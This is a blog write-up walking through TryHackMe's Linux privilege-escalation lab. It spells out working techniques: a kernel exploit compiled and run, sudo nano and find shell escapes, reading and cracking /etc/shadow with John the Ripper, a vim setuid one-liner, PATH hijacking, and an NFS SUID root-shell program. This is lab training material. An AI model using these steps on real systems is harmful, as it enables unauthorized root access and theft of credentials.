Try Hack Me: Linux PrivEsc Complete Write-up

christine - Jun 2 '22 - - Dev Community

Today I thought to write my own write-up on two labs that I found pretty challenging: The Linux PrivEsc and Windows PrivEsc labs on the Jr Penetration Tester path. Let's get started! 😊

gif

I will be skipping over the following tasks since it is read-only to complete:

  • Task 1: Introduction
  • Task 2: What is Privilege Escalation?
  • Task 4: Automated Enumeration Tools

Task 3: Enumeration

To read the instructions/general information for this section please go to the task dedicated to it. I will not be copying and pasting all the information since it will make the write-up bloated and honestly, if you're following along, it's unnecessary.

What is the hostname of the target system?
Open up your terminal via the AttackBox or OPENVPN, and let's SSH into the machine via the ssh karen@YOUR_MACHINE_IP command. Remember the password is Password1.
Linux PrivEsc

Once you're logged in, we can simply run the hostname command to find the hostname of our target machine. Voila, our first question is answered!
Linux PrivEsc
Linux PrivEsc

What is the Linux kernel version of the target system?
To find the kernel version of our system we can simply type in the uname -a command which will print system information giving us additional detail about the kernel used by the system.
Linux PrivEsc
Linux PrivEsc

What Linux is this?
We can use the cat /etc/issue command to find the operating system version.
Linux PrivEsc
Linux PrivEsc

What version of the Python language is installed on the system?
This was not in the instructions, but it's a pretty obvious one. We can simply run the python --version command to see which version is installed.
Linux PrivEsc
Linux PrivEsc

What vulnerability seem to affect the kernel of the target system? (Enter a CVE number)
For this we need to do a little bit of googling/searching on Exploit-DB.
Linux PrivEsc
Linux PrivEsc


Task 5: Privilege Escalation Kernel Exploits

Find and use the appropriate kernel exploit to gain root privileges on the target system.
Terminate your previous machine. Now, let's go through the steps of the Kernel exploit Methodology.

1. Identify the kernel version.
Linux PrivEsc

2. Search and find an exploit code for the kernel version of the target system.
This we can find with some quick Googling. Download the exploit and move it into your /tmp folder.
Linux PrivEsc
Linux PrivEsc

We can also get it via searchploit.
Linux PrivEsc

What is the content of the flag1.txt file?
3. Run the exploit.
Okay, open up the terminal on your local machine, and start up the machine in Attackbox. In Attackbox, let's run the id command and take note of our current user privilege.
Linux PrivEsc
Linux PrivEsc

On your local machine, we need to start up a python server so that we can send our downloaded exploit to our target machine in Attackbox. We can do this via the python3 -m http.server 8000 command. Don't close this terminal.
Linux PrivEsc

Open up a new tab/terminal so that we can get the IP address of our local machine. We need this to connect to our target machine. Use the ifconfig command and scroll down.

Linux PrivEsc

Cool, now we can go ahead and send our exploit that we downloaded and stored in our /tmp file to our target machine. Go to your Attackbox and first cd into your /tmp folder before connecting to your local machine.
Linux PrivEsc

If you don't cd into /tmp first then you will get an error when trying to connect. Now, to send the exploit and make a connection we can enter the following command (replace the IP with your ifconfig IP) wget http://yourip:8000/37292.c.
Linux PrivEsc

Okay, the exploit is sent. Now to convert it, we can enter the following command gcc 37292.c -o pwned. With our exploit converted, we can run it via the ./pwned command.
Linux PrivEsc

Now when we run the id command again, we can see that our user privilege changed! We will now be able to access files with ease.
Linux PrivEsc

Let's cd into /home via cd /home because we are currently in /tmp. From /home, lets run the ls command to see what we can find. We have a singular directory called matt.
Linux PrivEsc

Let's cd into matt via cd /home/matt and see what we can find via the ls command.
Linux PrivEsc

From there we can see that we have found the flag1.txt file. Let's read it via cat flag1.txt. We've successfully found the flag!
Linux PrivEsc
Linux PrivEsc


Task 6: Privilege Escalation Sudo

Terminate your previous machine and run the machine needed for this task. Open up your Attackbox to work directly in your browser, or ssh into Karen's account via your local machine's terminal.
Linux PrivEsc

*How many programs can the user "karen" run on the target system with sudo rights? *
To see how many programs "Karen" can run we have to run the sudo -l command. From here we can see that she can run 3 programs/commands, namely find, less, and nano.

Linux PrivEsc
Linux PrivEsc

What is the content of the flag2.txt file?
Let's first see what we can find in our current directory using ls. The /home directory is the most important for us, so let's cd into it. From there on, when we ls, we can see that there is a singular directory named ubuntu.
Linux PrivEsc

Let's cd into ubuntu via cd /home/ubuntu. When we run the ls command we can see that we successfully found the flag2.txt file.
Linux PrivEsc

Now, we can simply cat flag2.txt and voila, we've found our flag!
Linux PrivEsc
Linux PrivEsc

How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?

Linux PrivEsc

What is the hash of frank's password?

When we cd back to root via cd /, and we run the id command, we can see that we do not have root access, thus we will not be able to read Frank's password. Run cat /etc/shadow and you will see we cannot get access.
Linux PrivEsc

Let's fix that. Run sudo nano and press CTRL+R and CTRL+X. Enter the following command to gain root access: reset; bash 1>&0 2>&0 and press Enter.
Linux PrivEsc

When we run the id command now, we can see that we have root access.
Linux PrivEsc

Now we can go ahead and run cat /etc/shadow again and would you know it, we can now find Frank's hashed password!
Linux PrivEsc
Linux PrivEsc
Linux PrivEsc


Task 7: Privilege Escalation SUID

Which user shares the name of a great comic book writer?

Terminate your previous machine and reconnect to Karen's IP just like before. To find the users, we can run the cat /etc/passwd command.
Linux PrivEsc
Linux PrivEsc

Which user shares the name of a great comic book writer?

Before we start, on your local machine's Desktop, create a suid folder with the following files: passwd.txt and shadow.txt. Make sure you have the rockyou.txt file from previous labs in your /wordlists folder.
Linux PrivEsc

First we will need to find the password hashes for our passwd.txt file. Run the base64 /etc/passwd | base64 --decode command in your terminal and copy the last bit into your passwd.txt file.

Linux PrivEsc
Linux PrivEsc

Next we will need to find the password hashes for our shadow.txt file. Run the base64 /etc/shadow | base64 --decode command in your terminal and copy the last bit into your shadow.txt file.

Linux PrivEsc
Linux PrivEsc

Next, we need to unshadow our passwords. Head into your command line and enter the unshadow passwd.txt shadow.txt > passwords.txt command (where we are logged in as Karen). Our passwords.txt directory has been created.
Linux PrivEsc

Finally we can use the John The Ripper tool to crack the password. Run the command john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
Linux PrivEsc

At the end, you will see that the password is Password1.
Linux PrivEsc

What is the content of the flag3.txt file?
We can use the same trick as before. Enter the command base64 /home/ubuntu/flag3.txt | base64 --decode in your terminal (where we are logged in as Karen). Our flag is revealed.
Linux PrivEsc
Linux PrivEsc


Task 8: Privilege Escalation Capabilities

Terminate your previous session and log in as Karen (again).
How many binaries have set capabilities?
Run the getcap -r / 2>/dev/null command and count the binaries returned. We can count six binaries.
Linux PrivEsc
Linux PrivEsc

What other binary can be used through its capabilities?
Run the getcap -r / command and scroll down to the bottom. We can see the other binary is view.
Linux PrivEsc
Linux PrivEsc

What is the content of the flag4.txt file?
To do this, simply enter the following command into your terminal: ./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' This will open up a shell.
Linux PrivEsc

From there on we need to cd back into /home. Once you've done that enter cd /home/ubuntu, and enter ls.
Linux PrivEsc

We can read the flag4.txt file via the cat flag4.txt command.
Linux PrivEsc
Linux PrivEsc


Task 9: Privilege Escalation Cron Jobs

How many user-defined cron jobs can you see on the target system?
Terminate your previous machine and log into Karens system. I'll be working from the Attackbox for this task. Let's run the cat /etc/crontab command. We can see there are four user-defined cron jobs:



* * * * *  root /antivirus.sh
* * * * *  root antivirus.sh
* * * * *  root /home/karen/backup.sh
* * * * *  root /tmp/test.py


Enter fullscreen mode Exit fullscreen mode

Linux PrivEsc
Linux PrivEsc

What is the content of the flag5.txt file?
(Please follow Task notes on THM to find the flag.)
Linux PrivEsc

What is Matt's password?
(Please follow Task notes on THM to find the flag.)
Linux PrivEsc


Task 10: Privilege Escalation PATH

What is the odd folder you have write access for?
Terminate the previous machine and log into Karen's system.
If we loop at the task notes, we can see that we can use the find / -writable 2>/dev/null | grep home command to find the writable folders.
Linux PrivEsc
Linux PrivEsc

Exploit the $PATH vulnerability to read the content of the flag6.txt file.
In your terminal where you logged in as Karen, run the cd /home command so that we can see which files we can access. When we run -ls -a we can sere that we have matt, murdoch, and ubuntu. Our flag6.txt will be under matt, but let's see whats under murdoch since we have writeable access to it.
Linux PrivEsc

Once we cd into /home/murdoch, we can see that it has three files: test, thm and thm,py. Let's see what's in each. Before we cat each file, run the command bash.
Linux PrivEsc
Linux PrivEsc

To see what's under test, run file test.
Linux PrivEsc

To see what's under thm.py, run file thm.py and then cat thm.py.
Linux PrivEsc

When we try to do the same with thm, we see that no such file has been found. When we try to run ./test, we see that it is dependent on thm, so that means we will need to create a thm file and write a little script to read the contents of our flag6.txt file.
Linux PrivEsc

Create the thm file using touch thm.
Linux PrivEsc

Write the script into this file using echo cat /home/matt/flag6.txt" > thm.
Linux PrivEsc

Now, to make this thm file executable, we need to convert it using the chmod +x thm command.
Linux PrivEsc

Before we can now run ./test, we need to export the path via export PATH=/home/murdoch:$PATH
Linux PrivEsc

Finally, we can run the ./test command. We've successfully exploited our PATH vulnerability!
Linux PrivEsc

What is the content of the flag6.txt file?
We found the flag in the previous question after running the ./test command.
Linux PrivEsc
Linux PrivEsc


Task 11: Privilege Escalation NFS

How many mountable shares can you identify on the target system?
Terminate the previous machine and log into Karen's system. To enumerate mountable shares from our attacking machine we need to use the showmount -e <YOUR MACHINE IP> command.

Linux PrivEsc

From there on we can count three mountable shares.
Linux PrivEsc

How many shares have the "no_root_squash" option enabled?
To see this, run the command cat /etc/exports. We can count three no_root_squash options.
Linux PrivEsc
Linux PrivEsc

Gain a root shell on the target system
Follow the steps in the task instructions. It's exactly the same. So in a terminal, not the one you are logged in as Karen, do this:

mkdir /tmp/sharedfolder
sudo mount -o rw 10.10.114.12:/home/ubuntu/sharedfolder /tmp/sharedfolder

Linux PrivEsc

nano



//Enter into nano and save as nfs.c
#include <stdio.h>
#include <stdlib.h>

int main()
{
   setgid(0);
   setuid(0);
   system("/bin/bash");
   return 0;
}


Enter fullscreen mode Exit fullscreen mode

Linux PrivEsc

Now cd into the /tmp/sharedfolder directory and convert the .c file into an executable.
Linux PrivEsc

Now when you go over to Karen's system and cd into /home/ubuntu/sharedfolders and run the ls -l command, your nfs file should be there. You have now root access and can run ./nfs.
Linux PrivEsc

What is the content of the flag7.txt file?
Go ahead and run the cat /home/matt/flag7.txt command. The flag is revealed!
Linux PrivEsc


Task 12: Capstone Challenge

What is the content of the flag1.txt file?
Let's log into Leonard's system.
Linux PrivEsc

After that, let's see what type of privileges we have via the whoami and id commands.
Linux PrivEsc

Okay, let's see what we can find using the find / -type f -perm -04000 -ls 2>/dev/null command (we used this before). Remember in the SUID section when we used base64 to unshadow our /shadow and /passwd data? Let's do that again.
Linux PrivEsc

On your Desktop, create a SUID folder with two files: passwd.txt and shadow.txt.
Linux PrivEsc

In Leonard's terminal, run thebase64 /etc/shadow | base64 -d command and copy Missy's value into the shadow.txt file.
Linux PrivEsc
Linux PrivEsc

Then, run thebase64 /etc/passwd | base64 -d command and copy Missy's value into the passwd.txt file.
Linux PrivEsc
Linux PrivEsc

Now, in our attacker terminal, we can use John The Ripper to crack the password. Remembet, cd /Desktop/SUID first, then run the sudo unshadow passwd.txt shadow.txt > cracked.txt command to create the cracked.txt file.
Linux PrivEsc

Then, run the john command: john --wordlist=/usr/share/wordlists/rockyou.txt cracked.txt to crack the code. We can see that Missy's password is Password1.
Linux PrivEsc

Now, back in Leonard's terminal, let's log in as Missy. Run the su missy command and enter her password.
Linux PrivEsc

The sudo -l command will reveal that missy needs no password to access data.
Linux PrivEsc

Now we can go ahead and access our flag1.txt file. First we need to find it via the sudo find / -name "flag1.txt" command.
Linux PrivEsc

To read the flag, simply run cat /home/missy/Documents/flag1.txt. Our flag is revealed!
Linux PrivEsc
Linux PrivEsc

What is the content of the flag2.txt file?
let's see if we can find the flag2.txt file via the sudo find / -name "flag2.txt" command. We can see we need root access to access it.
Linux PrivEsc

To do this, simply say sudo find . -exec /bin/sh \; -quit.
Linux PrivEsc

Now when we run cat /home/rootflag/flag2.txt, we have access to the flag.
Linux PrivEsc
Linux PrivEsc


Conclusion

I hope this helped somewhat as this lab really challenged me, but it was so much fun and it felt good to complete it. Anyway, I got through it and now, so have you! 😀

Check out my GitHub for more.

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .